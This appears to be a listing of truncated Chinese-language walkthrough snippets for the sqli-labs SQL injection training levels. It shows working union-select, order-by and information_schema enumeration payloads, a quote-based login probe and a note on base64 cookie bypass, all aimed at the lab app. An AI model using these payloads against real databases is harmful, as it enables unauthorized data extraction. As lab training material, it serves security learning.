Less_1
查库:select schema_name from information_schema.schemata
查表:select table_name from information_schema.tables where table_schema=’表名’
查列:select column_name from informa...
Less-13
本关我们输入username:admin'
Password: (随便输)
进行测试
可以看到报错了,错误为:
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version fo...
GET篇
Less-1:
1.用order by得出待查表里有三个字段 http://192.168.40.165/sqli-labs-master/Less-1/?id=1' order by 3--+2.用union select得到数据库名——security http://192.168....
Less-21:括号+单引号绕过+base64cookie编码
总感觉我已经把sql注入做成代码审计了:P
<?php
//including the Mysql connect parameters.
include("../sql-connections/sql-connect.php");
if(!isset($_COOK...
Less-54:
?id=-1' union select 1,2,group_concat(table_name) from information_schema.tables where table_schema=database()--+
Your Password:CL0FY8NWDK
?id=-1' union select 1,database(),group_concat(co...